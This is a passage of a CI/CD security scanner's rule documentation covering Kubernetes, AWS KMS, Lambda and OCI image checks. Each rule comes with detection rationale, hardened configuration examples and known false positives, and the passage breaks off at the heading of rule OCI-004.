Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Pod Security Admission (PSA) replaced the deprecated PodSecurityPolicy in Kubernetes 1.25. The three levels are privileged, baseline, and restricted; baseline is a sensible production default and restricted matches the spirit of K8S-005..010. kube-system is exempt by convention since control-plane pods may legitimately need elevated permissions.

Recommendation. Set metadata.labels.pod-security.kubernetes.io/enforce to baseline or restricted on every Namespace. Without an enforce label the namespace runs the cluster's default policy, which on most installations is privileged and silently admits pods that violate every K8S-002..010 rule.
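A Namespace carrying all three PSA modes (the namespace name is illustrative; the warn/audit tiers follow the one-tier-ahead convention described under K8S-031):

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: app-prod
  labels:
    pod-security.kubernetes.io/enforce: baseline   # satisfies K8S-023
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted
```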

Known false positives.

  • Single-tenant clusters running only operator-managed workloads may apply PSA via an admission webhook instead. The label-based check can't see that.

Source: K8S-023 in the Kubernetes provider.

K8S-024: Container missing both livenessProbe and readinessProbe MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Init containers and ephemeral debug containers are exempt; neither makes sense to probe. Jobs and CronJobs are also exempt because Kubernetes treats them as one-shot work; completion is the lifecycle signal, not health.

Recommendation. Define at least one of livenessProbe or readinessProbe on every long-running container. Without probes, a wedged pod stays listed as Running and keeps receiving traffic, which masks incidents and amplifies the blast radius of a single faulty replica.
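A minimal probe pair for an HTTP workload; the /healthz path, port, and timings are illustrative assumptions, not values the scanner requires:

```yaml
containers:
  - name: app
    image: registry.example.com/app:1.0.0
    readinessProbe:        # gates Service traffic until the pod is ready
      httpGet:
        path: /healthz     # hypothetical health endpoint
        port: 8080
      initialDelaySeconds: 5
      periodSeconds: 10
    livenessProbe:         # restarts a wedged process
      httpGet:
        path: /healthz
        port: 8080
      failureThreshold: 3
      periodSeconds: 30
```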

Source: K8S-024 in the Kubernetes provider.

K8S-025: System priority class used outside kube-system HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC, CICD-SEC-7 Insecure System Configuration.

How this is detected. The kubelet reserves the two system-* priority classes for its own pods (kube-proxy, CNI agents). Granting them to a user workload also grants the right to preempt and evict anything below 2000000000, which is every non-system pod on the cluster. Outside kube-system this is almost always a misconfiguration copy-pasted from a control-plane manifest.

Recommendation. Reserve system-cluster-critical and system-node-critical priority classes for control-plane workloads in kube-system. Application pods that adopt them gain the right to evict normal workloads under resource pressure, which is a quiet path to a cluster-wide outage if the application has a bug or the attacker has any control over its spec.

Source: K8S-025 in the Kubernetes provider.

K8S-026: LoadBalancer Service has no loadBalancerSourceRanges HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Internal-only services should use type: ClusterIP (and an Ingress for HTTP) or set the cloud-provider-specific internal-LB annotation. loadBalancerSourceRanges is the Kubernetes-native, cloud-portable way to scope an external LB; cloud-specific firewalls (AWS security groups, GCP firewall rules) are equivalent at the L4 level but invisible to a manifest scanner.

Recommendation. Restrict every Service of type: LoadBalancer with spec.loadBalancerSourceRanges. The default behavior is to provision an internet-facing load balancer that accepts traffic from 0.0.0.0/0, which exposes whatever the Service fronts to the entire internet. A short list of CIDRs scoped to known clients (office IPs, a NAT gateway, peered VPCs) removes the pre-auth attack surface entirely.
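A sketch of a scoped LoadBalancer Service; the CIDRs below are documentation-only TEST-NET ranges standing in for real client networks:

```yaml
apiVersion: v1
kind: Service
metadata:
  name: app-lb
spec:
  type: LoadBalancer
  selector:
    app: app
  ports:
    - port: 443
      targetPort: 8443
  loadBalancerSourceRanges:    # only these CIDRs may connect
    - 203.0.113.0/24           # e.g. office egress range
    - 198.51.100.7/32          # e.g. NAT gateway
```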

Source: K8S-026 in the Kubernetes provider.

K8S-027: Ingress has no TLS configuration MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. An Ingress with no spec.tls (or an empty list) terminates HTTP at the load balancer and proxies plaintext upstream. Ingress controllers will respect ssl-redirect annotations, but those are advisory until tls: is populated. If the Ingress is intentionally HTTP-only (e.g. an ACME challenge endpoint or an internal-only path served behind a network policy), suppress via .pipelinecheckignore with a short rationale rather than leaving it open.

Recommendation. Add a spec.tls block to every Ingress that fronts an HTTP backend. Each entry pairs one or more hostnames with a Secret holding the certificate / key; the canonical pattern is to provision the Secret via cert-manager and a ClusterIssuer pointing at Let's Encrypt or an internal CA. Plaintext-only Ingress lets a network attacker downgrade the connection and read or rewrite request bodies, which matters for any path carrying credentials, session cookies, or PII.
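A sketch of the cert-manager pattern; the hostname, issuer name, and Secret name are illustrative assumptions:

```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: app
  annotations:
    cert-manager.io/cluster-issuer: letsencrypt-prod  # hypothetical ClusterIssuer
spec:
  tls:
    - hosts:
        - app.example.com
      secretName: app-tls       # cert-manager provisions this Secret
  rules:
    - host: app.example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: app
                port:
                  number: 8080
```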

Source: K8S-027 in the Kubernetes provider.

K8S-028: Container declares hostPort MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. hostPort was the pre-Service way to publish a pod's port and survives in legacy manifests. Modern clusters use Services, which integrate with the kube-proxy, ingress controllers, and NetworkPolicies. hostPort is invisible to all of those: a port-scan from any other pod that knows the node IP reaches the workload directly. If a DaemonSet legitimately needs it (host-agent shape), suppress this rule with a brief .pipelinecheckignore rationale rather than leaving it open across the catalog.

Recommendation. Drop hostPort from container ports and use a Service (ClusterIP / NodePort / LoadBalancer) to publish the workload. hostPort binds directly to the node IP, bypasses the cluster's network model, and creates a node-level scheduling constraint that fails replicas with the same port. Workloads that genuinely need node-port binding (some CNI/storage agents) should declare it on a DaemonSet with hostNetwork: true already approved by review.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-028 in the Kubernetes provider.

K8S-029: RoleBinding grants permissions to the default ServiceAccount HIGH 🔧 fix

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC.

How this is detected. Fires when a RoleBinding or ClusterRoleBinding lists kind: ServiceAccount, name: default among its subjects. kube-system, kube-public, and kube-node-lease are exempt because control-plane bootstrap manifests legitimately grant the default SA there.

Recommendation. Bind permissions to a dedicated ServiceAccount, not to default. Every pod that omits serviceAccountName runs as the namespace's default SA, so a binding to it grants the same verbs to every untargeted pod in that namespace, including future workloads. Create a purpose-built SA, set automountServiceAccountToken: false on the default, and bind to the new SA explicitly.
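The remediation has three parts, sketched together below; every name is illustrative, and the referenced Role (app-reader-role) is assumed to exist elsewhere in the manifest set:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-reader             # purpose-built SA, replaces `default` in the binding
  namespace: app-prod
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: app-prod
automountServiceAccountToken: false   # untargeted pods no longer mount a token
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: app-reader-binding
  namespace: app-prod
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: app-reader-role        # assumed pre-existing Role
subjects:
  - kind: ServiceAccount
    name: app-reader           # never `default`
    namespace: app-prod
```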

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Charts that intentionally re-use the default SA in single-tenant namespaces. Consider creating a named SA anyway. It keeps the audit log unambiguous about which workload made an API call.

Source: K8S-029 in the Kubernetes provider.

K8S-030: Workload schedules onto a control-plane node HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Fires on a non-system workload whose spec.nodeSelector contains a control-plane role label, OR whose spec.tolerations carries an entry with a control-plane taint key. Either condition is sufficient to land the pod on the control plane (the toleration is what survives the node taint; the nodeSelector picks the node).

Recommendation. Drop the nodeSelector and tolerations entries that target node-role.kubernetes.io/control-plane (or the legacy master spelling) from non-system workloads. A pod scheduled on a control-plane node shares the kernel with the API server, etcd, and kubelet credentials; credential theft from any such pod yields cluster-wide takeover. Application workloads belong on dedicated worker nodes; system add-ons that legitimately need control-plane scheduling should run as a DaemonSet in kube-system.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Audit/log shippers and CNI agents in kube-system are exempt by namespace. A workload that legitimately needs to run on the control plane outside kube-system is rare enough to warrant an explicit .pipelinecheckignore rationale.

Source: K8S-030 in the Kubernetes provider.

K8S-031: Namespace missing PSA warn label LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Pod Security Admission supports three modes: enforce (reject), audit (log to API audit), and warn (return a kubectl warning). K8S-023 covers enforce; this rule covers warn. The convention from upstream PSA docs is to set warn to the next-strictest tier above your current enforce so an upgrade from baseline to restricted is a predictable rollout, not a surprise.

Recommendation. Set metadata.labels.pod-security.kubernetes.io/warn on every Namespace, ideally one tier ahead of the enforce label (e.g. enforce: baseline + warn: restricted). The warn level surfaces violations as kubectl apply warnings without rejecting the resource; developers see what would break before an enforcement upgrade lands.

Known false positives.

  • Single-tenant clusters may set warn and audit globally via the AdmissionConfiguration defaults: block instead of per-namespace labels. The label-based check can't see that.

Source: K8S-031 in the Kubernetes provider.

K8S-032: Namespace lacks default-deny NetworkPolicy MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Kubernetes' default network model is allow-everything: without any NetworkPolicy targeting a namespace, every pod can talk to every other pod across every namespace, and every pod can reach the internet. A default-deny policy flips the default to deny, so the only flows that work are those an explicit allow policy permits. The check fires on namespaces declared in the manifest set that have at least one workload but no default-deny NetworkPolicy covering them. Cross-doc correlation: it walks the full manifest stream to match Namespace/workload/NetworkPolicy across files.

Recommendation. Apply a default-deny NetworkPolicy in every namespace that carries workloads. The canonical shape is podSelector: {} (matches every pod) plus policyTypes: [Ingress, Egress] with no ingress: / egress: rules; every flow is then denied unless a more permissive NetworkPolicy in the same namespace explicitly allows it. Pair with per-workload allow-list policies for the flows the application actually needs.
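The canonical shape described above, as a complete manifest (namespace name is illustrative):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: app-prod
spec:
  podSelector: {}        # matches every pod in the namespace
  policyTypes:
    - Ingress
    - Egress
  # no ingress:/egress: rules -> all flows denied unless another
  # NetworkPolicy in this namespace explicitly allows them
```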

Known false positives.

  • Mesh-managed clusters (Istio, Linkerd, Cilium ClusterMesh) often delegate L4 default-deny to the mesh's authorization policy. The check only looks at native NetworkPolicy and won't see that.
  • kube-system / kube-public / kube-node-lease are exempt: control-plane components frequently need open networking and have their own admission-time guards.

Source: K8S-032 in the Kubernetes provider.

K8S-033: Namespace lacks ResourceQuota or LimitRange MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without a ResourceQuota, a single namespace can consume the cluster's entire scheduling capacity: a fork bomb in a CronJob, a memory leak in a Deployment, or a cryptominer that landed via a fork-PR build can starve every other tenant. Without a LimitRange, individual pods without explicit resources: requests get a default of zero; the scheduler treats them as best-effort and packs them onto any node, including ones already at memory pressure. The two work together: quota caps the aggregate, range caps the per-workload baseline. Cross-doc correlation: walks the manifest stream to match Namespace / workload / ResourceQuota / LimitRange across files.

Recommendation. Apply a ResourceQuota and a LimitRange to every namespace that hosts application workloads. ResourceQuota caps the namespace's total CPU / memory / pod / object consumption; LimitRange enforces per-pod request / limit defaults so a workload that forgets to declare its own doesn't get unbounded scheduling. Together they bound the blast radius of a runaway, leaky, or attacker-driven pod explosion to a single namespace.
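A sketch of the pair; namespace name and every numeric ceiling are illustrative and should be sized to the tenant:

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: app-quota
  namespace: app-prod
spec:
  hard:                      # caps the namespace aggregate
    requests.cpu: "8"
    requests.memory: 16Gi
    limits.cpu: "16"
    limits.memory: 32Gi
    pods: "40"
---
apiVersion: v1
kind: LimitRange
metadata:
  name: app-defaults
  namespace: app-prod
spec:
  limits:
    - type: Container
      default:               # injected when a container omits limits
        cpu: 500m
        memory: 512Mi
      defaultRequest:        # injected when a container omits requests
        cpu: 100m
        memory: 128Mi
```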

Source: K8S-033 in the Kubernetes provider.

K8S-034: ServiceAccount automountServiceAccountToken not explicitly false MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. K8S-012 covers the pod-level automountServiceAccountToken setting; this rule covers the same control at the ServiceAccount level. The two are complementary: the SA-level default flips the cluster-wide baseline (true -> false), the pod-level override re-enables only where needed. Without the SA-level disable, every pod that doesn't set its own override mounts a token that can call the K8s API as that SA, a useful credential for an attacker who lands code in any pod, regardless of the workload's own intent.

Recommendation. Set automountServiceAccountToken: false at the ServiceAccount level for every SA that doesn't actively need to call the Kubernetes API. The pods that legitimately do (operators, sidecars that read namespaces, controllers) can opt back in per-pod via spec.automountServiceAccountToken: true. The default is mount-everywhere, which is the wrong direction for least privilege.
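Both halves of the pattern in one sketch (namespace and SA names are illustrative):

```yaml
# SA-level default: no token mounted into pods using this SA
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: app-prod
automountServiceAccountToken: false
---
# Pod-level opt-in for a workload that genuinely calls the API
apiVersion: v1
kind: Pod
metadata:
  name: operator
  namespace: app-prod
spec:
  serviceAccountName: operator-sa        # dedicated SA, not `default`
  automountServiceAccountToken: true
  containers:
    - name: operator
      image: registry.example.com/operator:1.0.0
```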

Known false positives.

  • Operator / controller workloads (cert-manager, metrics-server, ingress controllers) legitimately need API access from every pod. Their dedicated SAs should keep automount enabled; leave them out of the cluster-wide disable. The default SA in every namespace is the case this rule fires on most often and the one worth disabling.

Source: K8S-034 in the Kubernetes provider.

K8S-035: Container securityContext.runAsUser is 0 HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. K8S-007 covers runAsNonRoot: false (the boolean form). This rule covers the explicit numeric form: a container that sets runAsUser: 0 runs as root regardless of runAsNonRoot being declared elsewhere. Kubernetes won't reject the spec; it just runs the container as root. The two rules are paired so neither shape slips through alone. The pod-level securityContext.runAsUser inherits to every container that doesn't override it; this rule fires on the effective UID, walking pod-level first then per-container override.

Recommendation. Set securityContext.runAsUser to a non-zero UID (e.g. 1000 or any application-specific value) on every workload container. The corresponding runAsGroup and fsGroup should also be non-zero. Root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
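A pod-level securityContext that every container inherits; the UID/GID values are illustrative:

```yaml
spec:
  securityContext:           # pod-level, inherited unless a container overrides it
    runAsUser: 1000          # any non-zero, application-specific UID
    runAsGroup: 1000
    fsGroup: 1000
    runAsNonRoot: true       # pairs with K8S-007
  containers:
    - name: app
      image: registry.example.com/app:1.0.0
```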

Source: K8S-035 in the Kubernetes provider.

K8S-036: ServiceAccount imagePullSecrets references missing Secret MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Cross-doc correlation: walks every ServiceAccount's imagePullSecrets and confirms the named Secret exists in the same namespace within the manifest set. Misses two cases: secrets created out-of-band (Sealed Secrets, External Secrets, or operator-applied ones) and SAs whose namespace is implicit / not declared in the manifest set. For those, the rule passes (false-negative-friendly).

Recommendation. Create the missing Kind: Secret of type: kubernetes.io/dockerconfigjson (or dockercfg) in the same namespace before applying the ServiceAccount, or fix the imagePullSecrets reference name. A dangling reference doesn't fail apply; kubelet silently falls back to anonymous registry pulls on every image fetch. Workloads either pull a different image than the operator intended or fail at runtime with ImagePullBackOff after the registry rate-limits the unauthenticated client.

Known false positives.

  • Manifests rendered for partial deployment where the secret lives in a parallel manifest set the scanner doesn't see (separate ArgoCD application, Vault-injected, ESO-synced). Add # pipeline-check: ignore K8S-036 or ignore the specific SA name to silence.

Source: K8S-036 in the Kubernetes provider.

K8S-037: ConfigMap data carries a credential-shaped literal HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Companion to K8S-018 (which scans Kind: Secret). Walks ConfigMap data and binaryData for AKIA-shaped AWS keys and credential-shaped key NAMES. Even when the value is a placeholder, having api_key: REPLACE_ME in a ConfigMap is a maintenance footgun: someone will fill it in and commit. RBAC scoping for configmaps is typically much broader than secrets, so any credential leak via this path reaches a wider audience.

Recommendation. Move the value out of the ConfigMap. Secrets belong in Kind: Secret (better: SealedSecrets, ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection). ConfigMaps are intended for non-sensitive config and are mounted into pods without the access controls Secrets carry; the RoleBinding for configmaps:get is typically far broader than the one for secrets:get. A credential in a ConfigMap is effectively unprotected once any pod can read the namespace's config.

Known false positives.

  • ConfigMaps that legitimately carry placeholder names (DEBUG_TOKEN_FORMAT, LICENSE_KEY_HEADER) where the VALUE is a format hint rather than a credential. Rename the key to avoid the credential-shaped name.

Source: K8S-037 in the Kubernetes provider.

K8S-038: NetworkPolicy ingress / egress allows all sources or destinations MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. K8S-032 covers the absence of a default-deny NetworkPolicy. This rule covers the inverse: a NetworkPolicy that exists but contains an ingress: rule with no from: (allow from all) or no ports: filter, or an egress: rule with no to: filter. The from: [] / to: [] shorthand is the canonical mistake. A rule that lists specific peers via podSelector / namespaceSelector / ipBlock passes.

Recommendation. Replace the empty from: [] / to: [] rule with an explicit from: [{podSelector: {matchLabels: {…}}}] or from: [{namespaceSelector: {matchLabels: {…}}}] that names the legitimate peer. An empty from / to peers list means every source / destination, every pod in every namespace, plus every external IP. This is indistinguishable from having no NetworkPolicy at all for the targeted pod, but visually appears to enforce a policy (the false-sense-of-security failure mode is worse than no policy).
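A before/after sketch of the ingress: fragment inside a NetworkPolicy spec; the peer labels name a hypothetical ingress controller:

```yaml
# Fails K8S-038: empty peer list means every source
ingress:
  - from: []

# Passes: explicit peer selectors plus a port filter
ingress:
  - from:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: ingress-nginx  # hypothetical namespace
        podSelector:
          matchLabels:
            app: nginx-ingress
    ports:
      - protocol: TCP
        port: 8080
```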

Known false positives.

  • Policies intentionally allowing world traffic to a public ingress controller pod ({app: nginx-ingress, public: true}). Add # pipeline-check: ignore K8S-038 on the specific NetworkPolicy if the wide-open shape is deliberate.

Source: K8S-038 in the Kubernetes provider.

K8S-039: Pod uses shareProcessNamespace: true MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. shareProcessNamespace: true makes every container in the pod share a single PID namespace. Any container can then enumerate every other container's processes (ps), read their environment variables and CLI args from /proc/<pid>/, send them signals, and (with the right capabilities) ptrace them. A compromised sidecar (a debug shell, logging agent, or observability exporter) gets a free pivot into every primary container's secrets. The default is false; setting it explicitly to true is the failing shape.

Recommendation. Drop spec.shareProcessNamespace: true from the pod spec. Containers in the pod will go back to having isolated PID namespaces: each sees only its own processes, can't ptrace neighbors, and can't read their /proc/<pid>/environ for env-var-leaked secrets. If the requirement is sidecar-style log collection or process-level cooperation, prefer a sidecar pattern that exchanges data through a shared volume rather than collapsing the namespace.

Known false positives.

  • Debug pods that explicitly need ps / strace across container boundaries, but those are typically ephemeralContainers attached to a running pod, not long-lived pod specs in a manifest. If a permanent workload genuinely requires it, ignore the rule with a documented justification.

Source: K8S-039 in the Kubernetes provider.

K8S-040: Container securityContext.procMount: Unmasked HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. procMount: Unmasked is rarely needed in practice. It exists for nested-container / KubeVirt scenarios where the container itself runs an inner container runtime that needs to set up its own /proc masking. For an ordinary application container, Unmasked is a runtime-isolation regression that exposes kernel-information paths and writable /proc/sys entries to the workload. Pod Security Standards classify Unmasked as 'restricted'-violating; the rule fires when any container (containers, initContainers, ephemeralContainers) explicitly sets procMount: Unmasked.

Recommendation. Remove securityContext.procMount: Unmasked (or set it explicitly to Default). The Default procMount type masks several kernel- and node-information paths under /proc (/proc/asound, /proc/acpi, /proc/kcore, /proc/keys, /proc/latency_stats, /proc/timer_list, /proc/timer_stats, /proc/sched_debug, /proc/scsi) and remounts /proc/sys as read-only. These maskings are what stop a container from reading the host's kernel structures or writing to /proc/sys, which reaches kernel state shared across namespace boundaries. Unmasked undoes all of that.

Source: K8S-040 in the Kubernetes provider.

KMS-000: KMS API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: KMS-000 in the AWS provider.

KMS-001: KMS customer-managed key has rotation disabled MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Annual rotation regenerates the underlying key material for the same CMK ARN. Existing ciphertexts can still be decrypted (KMS keeps old material around), but new encrypts use the new material, so a cryptographic exposure (a side-channel, an accidental export, an old compromised offline backup) only compromises ciphertexts created before the rotation.

Recommendation. Enable annual rotation on every customer-managed KMS key used for CI/CD artifact, log, and secret encryption. Unrotated CMKs keep the same key material indefinitely, so a single cryptographic exposure (side-channel, accidental export) is permanent.

Source: KMS-001 in the AWS provider.

KMS-002: KMS key policy grants wildcard KMS actions HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. kms:* on a key policy is administrative authority over the cipher boundary: CancelKeyDeletion, ScheduleKeyDeletion, ReEncrypt, UpdateKeyDescription, and the data-plane decrypt actions all collapse into one grant. A CI/CD principal almost never needs more than the data-plane subset (Decrypt / GenerateDataKey / Encrypt).

Recommendation. Replace kms:* grants with specific actions needed by the caller (e.g. kms:Decrypt, kms:GenerateDataKey). Key-policy wildcard grants let any holder of the principal re-key, schedule deletion, or export material at will.

Source: KMS-002 in the AWS provider.

LMB-000: Lambda API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: LMB-000 in the AWS provider.

LMB-001: Lambda function has no code-signing config HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Lambda code-signing config + a Signer profile (SIGN-001) validates that an uploaded zip was signed by a known profile before it's allowed to run. Without one, anyone who reaches lambda:UpdateFunctionCode (via a CI/CD role compromise or a misattached IAM policy) can replace the function's code with no chain-of-custody check.

Recommendation. Create an AWS Signer profile, reference it from an aws_lambda_code_signing_config with untrusted_artifact_on_deployment = Enforce and attach that config to the function. Without one, the Lambda runtime will execute any code that a principal with lambda:UpdateFunctionCode uploads.

Source: LMB-001 in the AWS provider.

LMB-002: Lambda function URL has AuthType=NONE HIGH

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A Lambda function URL with AuthType=NONE is a public HTTPS endpoint. Anyone who knows the URL can invoke. This is sometimes deliberate (a webhook receiver), but the deliberate version typically signs / validates inside the function; the rule fires regardless because the IAM-side control isn't there.

Recommendation. Set the function URL auth_type to AWS_IAM and grant lambda:InvokeFunctionUrl through IAM. NONE exposes the function to the public internet without authentication.

Source: LMB-002 in the AWS provider.

LMB-003: Lambda function env vars may contain plaintext secrets HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Lambda env vars are world-readable to any principal with lambda:GetFunctionConfiguration, much wider than the principal that can invoke the function. They also persist in CloudFormation drift, change-sets, and CloudTrail events. A secret in a Lambda env var is essentially exposed to anyone with read access to the account.

Recommendation. Move secrets out of Lambda environment variables and into Secrets Manager or SSM Parameter Store. Environment variables are visible to anyone with lambda:GetFunctionConfiguration and persist in CloudTrail events, which keeps the secret in audit logs.

Source: LMB-003 in the AWS provider.

LMB-004: Lambda resource policy allows wildcard principal CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal Allow on a Lambda function resource policy lets anyone invoke. The legitimate case is a service principal (API Gateway, S3 events) where AWS fills in the SourceArn/SourceAccount at invoke time; without those conditions, any account using that service can invoke.

Recommendation. Remove Allow statements with Principal: '*' from every Lambda function resource policy, or scope them with a SourceArn / SourceAccount condition. Service principals (e.g. apigateway.amazonaws.com) are the common legitimate case; ensure they carry a condition.

Source: LMB-004 in the AWS provider.

OCI-001: Image manifest is missing OCI provenance annotations MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without the source and revision annotations, a pulled image can't be traced back to a source revision, so an incident-response team has no way to reach the build that produced it. The rule fires on whichever layer the manifest carries (top-level for an index, sub-manifest for a per-platform image). DF-016 catches the same gap at Dockerfile authoring time; OCI-001 catches it once the image has been built and any later docker buildx --annotation overrides have already been applied.

Recommendation. Stamp the image with at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). With docker buildx this is --label org.opencontainers.image.source=... plus --label org.opencontainers.image.revision=... at build time, or set them as image annotations through --annotation so they appear on the manifest itself (manifest.annotations is what registries surface to manifest inspect).
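A minimal sketch of the annotation check (hypothetical helper, manifest shape simplified to the fields that matter here):

```python
import json

REQUIRED = ("org.opencontainers.image.source",
            "org.opencontainers.image.revision")

def missing_provenance(manifest_json: str) -> list:
    """Provenance annotations absent from a manifest's annotations map."""
    annotations = json.loads(manifest_json).get("annotations", {})
    return [key for key in REQUIRED if key not in annotations]

stamped = json.dumps({"schemaVersion": 2, "annotations": {
    "org.opencontainers.image.source": "https://github.com/acme/app",
    "org.opencontainers.image.revision": "0123abcd"}})
bare = json.dumps({"schemaVersion": 2})
print(missing_provenance(stamped))  # []
print(missing_provenance(bare))     # both required keys
```

The same helper works on an index or a per-platform sub-manifest, since both carry a top-level annotations map when the annotations were applied at all.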

Known false positives.

  • Throwaway / scratch images that never leave a developer's machine (e.g. image inspect of an intermediate build stage) don't need provenance annotations. Suppress via ignore-file rather than removing the rule.

Source: OCI-001 in the OCI manifest provider.

OCI-002: Image is missing a build attestation manifest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Build attestations are the canonical place for SLSA provenance and SBOM data on an OCI image. A multi-platform image index that ships per-architecture manifests but no attestation-manifest sibling means there's no signed record of how the image was built or what's inside it, so consumers can't enforce SLSA Build-L2+ or feed an SBOM into vulnerability triage. A single-platform manifest (no image index) also fails this rule; attestations require the index-of-manifests shape that BuildKit produces by default.

Recommendation. Build the image with docker buildx build --attest=type=provenance,mode=max --attest=type=sbom (or the equivalent BuildKit frontend flags). Both attestations land as sibling sub-manifests inside the image index, annotated with vnd.docker.reference.type: attestation-manifest and linked to their target manifest via vnd.docker.reference.digest. Verify after pushing with docker buildx imagetools inspect <ref>; the Attestations section should list both predicate types.

Known false positives.

  • Intermediate / cache-only images pushed by CI for later-stage consumption may legitimately ship without attestations to keep build artifacts small. Suppress via ignore-file when this is the deliberate shape; the default expectation for any image that reaches a production registry is a full attestation set.
  • Some registries strip the attestation sub-manifests on pull (docker pull of a single platform unwraps the index). If the JSON you're scanning came from docker manifest inspect rather than docker buildx imagetools inspect --raw, attestations may be invisible even when present upstream.

Source: OCI-002 in the OCI manifest provider.

OCI-003: Image manifest is missing the image.created annotation LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Image age isn't a security boundary on its own, but a missing image.created annotation makes routine triage questions ("is this image stale enough to warrant a rebuild?", "was this image built before or after the CVE-2024-XXXX advisory?") much harder to answer automatically. Surfacing the gap as LOW-severity catches the omission early without overwhelming reports for an otherwise-well-formed image.

Recommendation. Stamp org.opencontainers.image.created with the build timestamp (RFC 3339 / ISO 8601, e.g. 2025-01-30T18:00:00Z). With docker buildx either pass --label org.opencontainers.image.created=$(date -u +%Y-%m-%dT%H:%M:%SZ) at build time, or rely on the BuildKit frontend default, which stamps it automatically when SOURCE_DATE_EPOCH is unset. The annotation lets downstream vuln scanners and registries surface image age, which is the lightest-weight CVE-triage signal available without pulling the config blob.
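To show what a downstream consumer gains from the annotation, here is a hypothetical triage helper (not part of the scanner) that turns image.created into an age in days:

```python
import json
from datetime import datetime, timezone

def image_age_days(manifest_json: str):
    """Age in days from org.opencontainers.image.created, or None when
    the annotation is absent -- the gap OCI-003 flags."""
    annotations = json.loads(manifest_json).get("annotations", {})
    created = annotations.get("org.opencontainers.image.created")
    if created is None:
        return None
    # RFC 3339 "Z" suffix -> explicit UTC offset for fromisoformat().
    built = datetime.fromisoformat(created.replace("Z", "+00:00"))
    return (datetime.now(timezone.utc) - built).days

stamped = json.dumps({"annotations": {
    "org.opencontainers.image.created": "2025-01-30T18:00:00Z"}})
print(image_age_days(stamped))          # days since the build
print(image_age_days(json.dumps({})))   # None
```

With the age in hand, a fleet scan can answer "built before or after the advisory?" by comparing one timestamp instead of pulling and inspecting every config blob.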

Known false positives.

  • Reproducible-build pipelines deliberately omit image.created (or pin it to SOURCE_DATE_EPOCH) so the same source produces a byte-identical image. Suppress via ignore-file when reproducibility is the goal.

Source: OCI-003 in the OCI manifest provider.

OCI-004: Image layer references an arbitrary URL (foreign layer) HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

